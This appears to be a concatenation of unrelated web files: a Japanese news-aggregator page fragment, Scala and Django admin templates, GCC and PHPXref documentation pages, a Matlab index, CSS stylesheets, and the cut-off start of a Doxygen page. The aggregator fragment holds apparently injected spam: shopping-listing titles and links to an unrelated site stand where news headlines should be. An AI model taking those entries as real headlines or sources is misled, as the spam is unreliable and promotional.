href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">大安・仏滅…記載は不適切、県がカレンダー回収 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 67 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/770aec9bed626d0714c63dd827bad4f4c20876b2.jpg" width="120" height="172" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">387<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410411s57ro.html">http://factory.aedew.com/images/Core2Duo/020410411s57ro.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 28 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/f2a5b22bc8e16c4289aaf7767c8ef71cce9c4104.jpg" width="120" height="129" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">134<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000004-nksports-socc" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">柿谷曜一朗C大阪復帰 違約金大幅減少で完全移籍へ (日刊スポーツ) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">145<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古パソコン ★希少なブルーカラー!人気の液晶一体型VAIO★ SONY VAIO VGC-LB63 2GBメモリ DVDマルチ 160GBHDD 無線LAN ブルーカラー Windows7 中古デスクトップ 【KingsoftOffice付(2013)】【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3df371797c2edb03a03491018247c6d1d6d51e42.jpg" width="160" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-20px" /></a></div> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00010000-chibatopi-l12" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410459s12nm.html">http://factory.aedew.com/images/Core2Duo/020410459s12nm.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 12 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/5f191d984c12ff6d166bf0cb65f99c56fedea305.jpg" width="180" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-30px" /></a></div> <div class="item_status"> <span class="link_num over20">50<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://news.nicovideo.jp/watch/nw1961232" target="_blank" class="item_direct"> - news.nicovideo.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410365s02rf.html">http://factory.aedew.com/images/Core2Duo/020410365s02rf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 11 --></span> <div class="more"><a href="">もっと画像で見る</a></div></div> </div> </div> </div> </div> </div><!-- end field_inner --> </div><!-- end field--> <div id="footer_menu_bar" class="menu_bar"> <div id="footer_menu_bar_inner" class="menu_bar_inner"><ul><li><a href="/" class="selected">トップ</a></li><li><a href="/all/newitem/">速報</a></li><li><a href="/news/">ニュース総合</a></li><li><a href="/society/">政治経済</a></li><li><a href="/entertainment/">エンタメ</a></li><li><a href="/sports/">スポーツ</a></li><li><a href="/itnews/">IT</a></li><li><a href="/international/">海外</a></li><li><a href="/science/">科学</a></li><li><a href="/odekake/">おでかけ</a></li><li><a href="/movie/">動画</a></li><li><a href="/2ch/">2ch</a></li><li><a href="/neta/">ネタ</a></li><li><a href="/all/">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="footer"> <div id="footer_inner"> <a href="" title="【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n "><img src="/img/logo_s.png" width="64px" height="32px" /></a>  <span class="icon_set"> <a href="" title="RSS" class="icon icon_rss"></a> <a href="http://www.twitter.com/" target="_blank" title="twitter【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " class="icon icon_facebook"></a> </span> <br /> <a href="">このサイトについて</a> - <a href="">ご意見・お問い合わせ</a> - <a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a> <br /><br /> <div class="footer_copyright"> <a href="">天気アプリ</a> | <a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a> | <a href="">画像検索</a> | <a href="">Android音楽プレイヤー</a> | <a href="">メモ帳アプリ</a> </div> </div><!-- end footer_inner--> </div><!-- end footer--> </div><!-- end main--> </body> </html>
app/views/editcourses/courseFields.scala.html
P1tt187/fhs-schedule-generator
@(course: models.persistence.participants.Course, allRooms:List[persistence.location.RoomEntity]) @import models.persistence.participants.Group <br/> <div class="row-fluid"> <div class="col-md-12"> <form class="form-inline" role="form" id="courseFieldForm"> <div class="form-group"> <label for="courseName" class="control-label">Kursname</label> <input class="form-control" type="text" name="courseName" id="courseName" value="@course.getFullName" required/> </div> <div class="form-group"> <label for="courseShortName" class="control-label">Abkürzung</label> <input class="form-control " type="text" name="courseShortName" id="courseShortName" value="@course.getShortName" required/> </div> <div class="form-group" id="courseSizeContainer"> <label for="courseSize" class="control-label">Kursstärke</label> <input type="number" class="form-control" name="courseSize" id="courseSize" value="@course.getSize" step="1" min="1" required/> </div> <div class="form-group"> <label class="control-label" for="classRoom">Klassenraum</label> <select class="form-control" name="classRoom" id="classRoom"> <option value="-1" @if(course.getClassRoom==null){selected}> keiner </option> @for(r<-allRooms){ <option value="@r.getId" @if(course.getClassRoom!= null && course.getClassRoom.compareTo(r)==0){selected } >@r.getHouse.getName @r.getNumber</option> } </select> </div> <br/> <br/> <div class="form-group"> <button class="btn btn-success" type="submit" ><span class="glyphicon glyphicon-ok-sign"></span> </button> </div> <div class="form-group"> <button id="deleteCurseBtn" class="btn btn-danger" type="button" ><span class="glyphicon glyphicon-trash"></span></button> </div> </form> <div class="clearfix"></div> <br /> <form class="form-inline" method="post" action="@routes.CEditCourses.generateStudentsForCourse(course.getId)"> <div class="form-group"> <button type="submit" class="btn btn-info"><span class="glyphicon glyphicon-refresh"></span> Generiere Studenten</button> </div> </form> </div> <div class="clearfix"></div> <div class="col-md-5 hidden" id="deleteErrorContainer"> <div class="alert alert-danger"> Fehler <span class="glyphicon glyphicon-thumbs-down"></span><br/> Die Folgenden Veranstaltungen sind noch mit dem Kurs verknüpft: <ul id="displayDeleteError"></ul> </div> </div> </div> <div class="clearfix"></div> <div class="row-fluid"> <br /> <div id="courseEditResult" class="col-md-5"></div> </div> <div class="clearfix"></div> <script type="text/javascript"> initSelect ( ) ; $('#deleteCurseBtn' ).on('click',function(){ console.log('delete Button Clicked'); $.ajax({ type : "POST", url: "@routes.CEditCourses.deleteCourse(course.getId)", success : function ( callback ) { $(location ).attr('href','@routes.CEditCourses.page()'); }, error:function(jqXHR , textStatus, errorThrown){ console.log( jqXHR.responseText); var errorString = ''; jqXHR.responseText.split(',').forEach(function(element){ errorString+= '<li>' + element + '</li>' }); $('#deleteErrorContainer' ).removeClass('hidden'); $('#displayDeleteError' ).html(errorString); } }); }); $ ( '#courseFieldForm' ).on ( 'submit', function ( e ) { e.preventDefault ( ) ; $ ( '.has-error' ).removeClass ( 'has-error' ) ; if ( ! $.isNumeric ( $ ( '#courseSize' ).val ( ) ) ) { $ ( '#courseSizeContainer' ).addClass ( 'has-error' ) ; return ; } var formData = $ ( '#courseFieldForm' ).serializeObject ( ) ; formData[ 'courseId' ] = @course.getId ; $.ajax ( { cache : false, type : "POST", dataType : "json", data : JSON.stringify ( formData ), context : this, contentType : "application/json; charset=utf-8", url : " @routes.CEditCourses.saveCourseData ", success : function ( callback ) { console.log ( JSON.stringify ( callback ) ) ; $ ( '#courseEditResult' ).empty ( ).append ( '<div class="alert alert-success">Erfolg <span class="glyphicon glyphicon-thumbs-up"></span></div>' ) ; }, error : function ( callback ) { // error handler console.log ( JSON.stringify ( callback ) ) ; $ ( '#courseEditResult' ).empty ( ).append ( '<div class="alert alert-danger">Fehler <span class="glyphicon glyphicon-thumbs-down"></span></div>' ) ; var response = callback.responseJSON ; $ ( '#' + response.result ).addClass ( 'has-error' ) ; } } ) ; console.debug ( JSON.stringify ( formData ) ) ; } ) ; </script> <div class="page-header"> <h3>Gruppen bearbeiten</h3> </div> <div class="row-fluid"> <form id="addGroup" class="form-inline"> <div class="form-group"> <label for="addGroupTypeName" class="control-label ">Gruppentyp</label> <input id="addGroupTypeName" name="addGroupTypeName" type="text" class="form-control" required placeholder="Gruppentyp"/> </div> <div class="form-group" id="addGroupCountContainer"> <label for="addGroupCount" class="control-label">Anzahl der Gruppen</label> <input id="addGroupCount" name="addGroupCount" type="number" class="form-control" required placeholder="Anzahl" min="1"/> </div> <div class="form-group" > <label for="submitAddGroup" class="control-label"> <span class="glyphicon"></span> </label> <button id="submitAddGroup" type="submit" class="btn btn-success"><span class="glyphicon glyphicon-plus"></span> </button> </div> </form> </div> <div class="clearfix"></div> <div class="row-fluid"> <br/> <div id="addGroupResult" class="col-md-5"></div> </div> <div class="clearfix"></div> <script type="text/javascript"> $ ( '#addGroup' ).on ( 'submit', function ( e ) { e.preventDefault ( ) ; $ ( '.has-error' ).removeClass ( 'has-error' ) ; if ( ! $.isNumeric ( $ ( '#addGroupCount' ).val ( ) ) ) { $ ( '#addGroupCountContainer' ).addClass ( 'has-error' ) ; return ; } var formData = $ ( '#addGroup' ).serializeObject ( ) ; formData[ 'courseId' ] = @course.getId ; formData[ 'addGroupCount' ] = Number ( formData[ 'addGroupCount' ] ) ; $.ajax ( { cache : false, type : "POST", dataType : "json", data : JSON.stringify ( formData ), context : this, contentType : "application/json; charset=utf-8", url : "@routes.CEditCourses.saveGroupData", success : function ( callback ) { console.log ( JSON.stringify ( callback ) ) ; $ ( '#addGroupResult' ).empty ( ).append ( '<div class="alert alert-success">Erfolg <span class="glyphicon glyphicon-thumbs-up"></span></div>' ) ; //$ ( '#bigGroupContainer' ).append ( '<div class="clearfix"></div>' + callback.htmlresult ) ; location.reload(true); }, error : function ( callback ) { // error handler console.log ( JSON.stringify ( callback ) ) ; $ ( '#addGroupResult' ).empty ( ).append ( '<div class="alert alert-danger">Fehler <span class="glyphicon glyphicon-thumbs-down"></span></div>' ) ; var response = callback.responseJSON ; $ ( '#' + response.result ).addClass ( 'has-error' ) ; } } ) ; console.debug ( JSON.stringify ( formData ) ) ; } ) ; </script> <div id="bigGroupContainer"> @groupParts(course) </div>
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gccint/_003ccode_003eGIMPLE_005fOMP_005fORDERED_003c_002fcode_003e.html
jocelynmass/nrf51
<html lang="en"> <head> <title>@code{GIMPLE_OMP_ORDERED} - GNU Compiler Collection (GCC) Internals</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="GNU Compiler Collection (GCC) Internals"> <meta name="generator" content="makeinfo 4.8"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="Tuple-specific-accessors.html#Tuple-specific-accessors" title="Tuple specific accessors"> <link rel="prev" href="_0040code_007bGIMPLE_005fOMP_005fMASTER_007d.html#g_t_0040code_007bGIMPLE_005fOMP_005fMASTER_007d" title="@code{GIMPLE_OMP_MASTER}"> <link rel="next" href="_0040code_007bGIMPLE_005fOMP_005fPARALLEL_007d.html#g_t_0040code_007bGIMPLE_005fOMP_005fPARALLEL_007d" title="@code{GIMPLE_OMP_PARALLEL}"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- Copyright (C) 1988-2017 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being ``Funding Free Software'', the Front-Cover Texts being (a) (see below), and with the Back-Cover Texts being (b) (see below). A copy of the license is included in the section entitled ``GNU Free Documentation License''. (a) The FSF's Front-Cover Text is: A GNU Manual (b) The FSF's Back-Cover Text is: You have freedom to copy and modify this GNU Manual, like GNU software. Copies published by the Free Software Foundation raise funds for GNU development.--> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> </head> <body> <div class="node"> <p> <a name="%3ccode%3eGIMPLE_OMP_ORDERED%3c%2fcode%3e"></a> <a name="g_t_003ccode_003eGIMPLE_005fOMP_005fORDERED_003c_002fcode_003e"></a> Next:&nbsp;<a rel="next" accesskey="n" href="_003ccode_003eGIMPLE_005fOMP_005fPARALLEL_003c_002fcode_003e.html#g_t_003ccode_003eGIMPLE_005fOMP_005fPARALLEL_003c_002fcode_003e">&lt;code&gt;GIMPLE_OMP_PARALLEL&lt;/code&gt;</a>, Previous:&nbsp;<a rel="previous" accesskey="p" href="_003ccode_003eGIMPLE_005fOMP_005fMASTER_003c_002fcode_003e.html#g_t_003ccode_003eGIMPLE_005fOMP_005fMASTER_003c_002fcode_003e">&lt;code&gt;GIMPLE_OMP_MASTER&lt;/code&gt;</a>, Up:&nbsp;<a rel="up" accesskey="u" href="Tuple-specific-accessors.html#Tuple-specific-accessors">Tuple specific accessors</a> <hr> </div> <h4 class="subsection">11.8.18 <code>GIMPLE_OMP_ORDERED</code></h4> <p><a name="index-g_t_0040code_007bGIMPLE_005fOMP_005fORDERED_007d-2370"></a> <div class="defun"> &mdash; GIMPLE function: gimple <b>gimple_build_omp_ordered</b> (<var>gimple_seq body</var>)<var><a name="index-gimple_005fbuild_005fomp_005fordered-2371"></a></var><br> <blockquote><p>Build a <code>GIMPLE_OMP_ORDERED</code> statement. </p></blockquote></div> <p><code>BODY</code> is the sequence of statements inside a loop that will executed in sequence. </body></html>
_functions/get_calendar.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get_calendar()</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_functions'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logFunction('get_calendar'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Function and Method Cross Reference</h3> <h2><a href="index.html#get_calendar">get_calendar()</a></h2> <b>Defined at:</b><ul> <li><a href="../skins_fallback_v5/_wp_compatibility.inc.php.html#get_calendar">/skins_fallback_v5/_wp_compatibility.inc.php</a> -> <a onClick="logFunction('get_calendar', '/skins_fallback_v5/_wp_compatibility.inc.php.source.html#l26')" href="../skins_fallback_v5/_wp_compatibility.inc.php.source.html#l26"> line 26</a></li> </ul> <b>No references found.</b><br><br> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
funcs/trixfit/rescal6/index.html
substance33/spec1d
<TITLE>Matlab Index</TITLE> <BODY> <H1>Matlab Index</H1> Produced by <A HREF = "http://www.nd.edu/Courses/kantor/matlab/mat2html">mat2html</A> on Thu Aug 1 14:28:11 1996 <BR> Cross-Directory links are: OFF<BR> <HR><H2>Matlab Directory Indices</H2> <pre> <UL> <LI><A HREF = "1../index.html">.</A></LI> </UL> <HR><H2>Identifiers found in these directories</H2> <A HREF = "1../mc_conv.html">mc_conv</A> <A HREF = "1../mc_grid.html">mc_grid</A> <A HREF = "1../mc_monte.html">mc_monte</A> <A HREF = "1../mc_prt.html">mc_prt</A> <A HREF = "1../mc_sqw.html">mc_sqw</A> <A HREF = "1../mc_sqw_save.html">mc_sqw_save</A> <A HREF = "1../mc_win.html">mc_win</A> <A HREF = "1../rc_bragg.html">rc_bragg</A> <A HREF = "1../rc_bugs.html">rc_bugs</A> <A HREF = "1../rc_cnmat.html">rc_cnmat</A> <A HREF = "1../rc_ellip.html">rc_ellip</A> <A HREF = "1../rc_exit.html">rc_exit</A> <A HREF = "1../rc_getp.html">rc_getp</A> <A HREF = "1../rc_help.html">rc_help</A> <A HREF = "1../rc_illp.html">rc_illp</A> <A HREF = "1../rc_inst.html">rc_inst</A> <A HREF = "1../rc_int.html">rc_int</A> <A HREF = "1../rc_lab.html">rc_lab</A> <A HREF = "1../rc_lineread.html">rc_lineread</A> <A HREF = "1../rc_phon.html">rc_phon</A> <A HREF = "1../rc_popma.html">rc_popma</A> <A HREF = "1../rc_projs.html">rc_projs</A> <A HREF = "1../rc_prt.html">rc_prt</A> <A HREF = "1../rc_re2rc.html">rc_re2rc</A> <A HREF = "1../rc_res.html">rc_res</A> <A HREF = "1../rc_savp.html">rc_savp</A> <A HREF = "1../rc_test.html">rc_test</A> <A HREF = "1../rescal.html">rescal</A> <A HREF = "1../trixsqw.html">trixsqw</A> <HR></BODY>
apps/assets/templates/assets/admin_user_detail.html
sdgdsffdsfff/jumpserver
{% extends 'base.html' %} {% load static %} {% load i18n %} {% block custom_head_css_js %} <link href="{% static 'css/plugins/select2/select2.min.css' %}" rel="stylesheet"> <script src="{% static 'js/plugins/select2/select2.full.min.js' %}"></script> {% endblock %} {% block content %} <div class="wrapper wrapper-content animated fadeInRight"> <div class="row"> <div class="col-sm-12"> <div class="ibox float-e-margins"> <div class="panel-options"> <ul class="nav nav-tabs"> <li class="active"> <a href="{% url 'assets:admin-user-detail' pk=admin_user.pk %}" class="text-center"><i class="fa fa-laptop"></i> {% trans 'Detail' %} </a> </li> <li> <a href="{% url 'assets:admin-user-assets' pk=admin_user.pk %}" class="text-center"><i class="fa fa-laptop"></i> {% trans 'Assets list' %} </a> </li> <li class="pull-right"> <a class="btn btn-outline btn-default" href="{% url 'assets:admin-user-update' pk=admin_user.id %}"><i class="fa fa-edit"></i>{% trans 'Update' %}</a> </li> <li class="pull-right"> <a class="btn btn-outline btn-danger btn-delete-admin-user"> <i class="fa fa-trash-o"></i>{% trans 'Delete' %} </a> </li> </ul> </div> <div class="tab-content"> <div class="col-sm-8" style="padding-left: 0;"> <div class="ibox float-e-margins"> <div class="ibox-title"> <span class="label"><b>{{ admin_user.name }}</b></span> <div class="ibox-tools"> <a class="collapse-link"> <i class="fa fa-chevron-up"></i> </a> <a class="dropdown-toggle" data-toggle="dropdown" href="#"> <i class="fa fa-wrench"></i> </a> <ul class="dropdown-menu dropdown-user"> </ul> <a class="close-link"> <i class="fa fa-times"></i> </a> </div> </div> <div class="ibox-content"> <table class="table"> <tbody> <tr class="no-borders-tr"> <td>{% trans 'Name' %}:</td> <td><b>{{ admin_user.name }}</b></td> </tr> <tr> <td>{% trans 'Username' %}:</td> <td><b>{{ admin_user.username }}</b></td> </tr> <tr> <td>{% trans 'Date created' %}:</td> <td><b>{{ admin_user.date_created }}</b></td> </tr> <tr> <td>{% trans 'Created by' %}:</td> <td><b>{{ asset_group.created_by }}</b></td> </tr> <tr> <td>{% trans 'Comment' %}:</td> <td><b>{{ admin_user.comment }}</b></td> </tr> </tbody> </table> </div> </div> </div> <div class="col-sm-4" style="padding-left: 0;padding-right: 0"> <div class="panel panel-primary"> <div class="panel-heading"> <i class="fa fa-info-circle"></i> {% trans 'Replace node assets admin user with this' %} </div> <div class="panel-body"> <table class="table group_edit" id="table-clusters"> <tbody> <form> <tr> <td colspan="2" class="no-borders"> <select data-placeholder="{% trans 'Select nodes' %}" id="nodes_selected" class="nodes-select2" style="width: 100%" multiple="" tabindex="4"> {% for node in nodes %} <option value="{{ node.id }}" id="opt_{{ node.id }}" >{{ node.full_value }}</option> {% endfor %} </select> </td> </tr> <tr> <td colspan="2" class="no-borders"> <button type="button" class="btn btn-primary btn-sm" id="btn-change-admin-user">{% trans 'Confirm' %}</button> </td> </tr> </form> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> </div> </div> {% endblock %} {% block custom_foot_js %} <script> function replaceNodeAssetsAdminUser(nodes) { var the_url = "{% url 'api-assets:replace-nodes-admin-user' pk=admin_user.id %}"; var body = { nodes: nodes }; var success = function(data) { // remove all the selected groups from select > option and rendered ul element; $('.select2-selection__rendered').empty(); $('#nodes_selected').val(''); $.map(jumpserver.nodes_selected, function(value, index) { $('#opt_' + index).remove(); }); // clear jumpserver.groups_selected jumpserver.nodes_selected = {}; }; requestApi({ url: the_url, body: JSON.stringify(body), success: success }); } jumpserver.nodes_selected = {}; $(document).ready(function () { nodesSelect2Init(".nodes-select2") .on('select2:select', function(evt) { var data = evt.params.data; jumpserver.nodes_selected[data.id] = data.text; }).on('select2:unselect', function(evt) { var data = evt.params.data; delete jumpserver.nodes_selected[data.id] }); }) .on('click', '.btn-delete-admin-user', function () { var $this = $(this); var name = "{{ admin_user.name }}"; var uid = "{{ admin_user.id }}"; var the_url = '{% url "api-assets:admin-user-detail" pk=DEFAULT_PK %}'.replace('{{ DEFAULT_PK }}', uid); var redirect_url = "{% url 'assets:admin-user-list' %}"; objectDelete($this, name, the_url, redirect_url); }) .on('click', '#btn-change-admin-user', function () { if (Object.keys(jumpserver.nodes_selected).length === 0) { return false; } var nodes = []; $.map(jumpserver.nodes_selected, function(value, index) { nodes.push(index); }); replaceNodeAssetsAdminUser(nodes); }) </script> {% endblock %}
bin/Data/Plugins/HTMLReport/Standard/Report.css
weyk/dbdesighner4fork2
/* Links defaults */ a {color:#000000; text-decoration: underline;} a:hover { text-decoration: none; color: #ff0000; text-decoration: underline} /* Scrollers */ body, textarea { scrollbar-base-color:#eeeeee; scrollbar-3dlight-color:#62708A; scrollbar-arrow-color:#62708A; scrollbar-darkshadow-color:#000000; scrollbar-face-color:#eeeeee; scrollbar-highlight-color:#ffffff; scrollbar-shadow-color:#aaaaaa; scrollbar-track-color:#eeeeee;} /* NoMargins */ body { margin-left: 15px; margin-right: 15px; margin-top: 15px; margin-bottom: 15px } /* General Font */ div, p, td {font-family: Tahoma, Verdana, Arial, MS Sans Serif; color: black; font-size: 11px} /* Fonts */ .fontNB {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 11px; font-weight: 700} .fontL {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 12px} .fontX {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 14px; font-weight: 700} .fontXB {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 16px; font-weight: 700} .fontS {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 10px; font-weight: 500} .fontSB {font-family: Tahoma, Verdana, Arial, Helvetica; font-size: 10px; font-weight: 700}
media/cck/css/definitions/writing.css
Octopoos/SEBLOD
/** * @version SEBLOD 3.x Core * @package SEBLOD (App Builder & CCK) // SEBLOD nano (Form Builder) * @url https://www.seblod.com * @editor Octopoos - www.octopoos.com * @copyright Copyright (C) 2009 - 2018 SEBLOD. All Rights Reserved. **/ /* FONT */ .cck-font-style-italic{font-style:italic!important;}.cck-font-style-normal{font-style:normal!important;} .cck-font-weight-bold{font-weight:bold!important}.cck-font-weight-normal{font-weight:normal!important} .cck-font-size-0-9em{font-size:0.9em!important;}.cck-font-size-1em, .cck-font-size-1-0em{font-size:1.0em!important;}.cck-font-size-1-1em{font-size:1.1em!important;}.cck-font-size-1-2em{font-size:1.2em!important;} /* TEXT */ .cck-text-align-center{text-align:center!important;}.cck-text-align-justify{text-align:justify!important;}.cck-text-align-left{text-align:left!important;}.cck-text-align-right{text-align:right!important;} .cck-text-transform-capitalize{text-transform:capitalize!important;}.cck-text-transform-lowercase{text-transform:lowercase!important;}.cck-text-transform-uppercase{text-transform:uppercase!important;} .cck-text-decoration-none{text-decoration:none!important;}.cck-text-decoration-line-through{text-decoration:line-through!important;}.cck-text-decoration-underline{text-decoration:underline!important;}
docs/doxygen/html/struct__segment.html
huydhn/Detector
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"/> <meta name="keywords" content="TEMU, dynamic analysis, binary analysis, dynamic taint analysis"/> <meta name="description" content="C/C++/OCaml Source Code Documentation for the TEMU Project."/> <title>TEMU: _segment Struct Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"/> </head><body> <p class="title">TEMU: Dynamic Binary Analysis Platform</p> <!-- Generated by Doxygen 1.5.8 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li class="current"><a href="annotated.html"><span>Data&nbsp;Structures</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="dirs.html"><span>Directories</span></a></li> <li> <form action="search.php" method="get"> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td><label>&nbsp;<u>S</u>earch&nbsp;for&nbsp;</label></td> <td><input type="text" name="query" value="" size="20" accesskey="s"/></td> </tr> </table> </form> </li> </ul> </div> <div class="tabs"> <ul> <li><a href="annotated.html"><span>Data&nbsp;Structures</span></a></li> <li><a href="classes.html"><span>Data&nbsp;Structure&nbsp;Index</span></a></li> <li><a 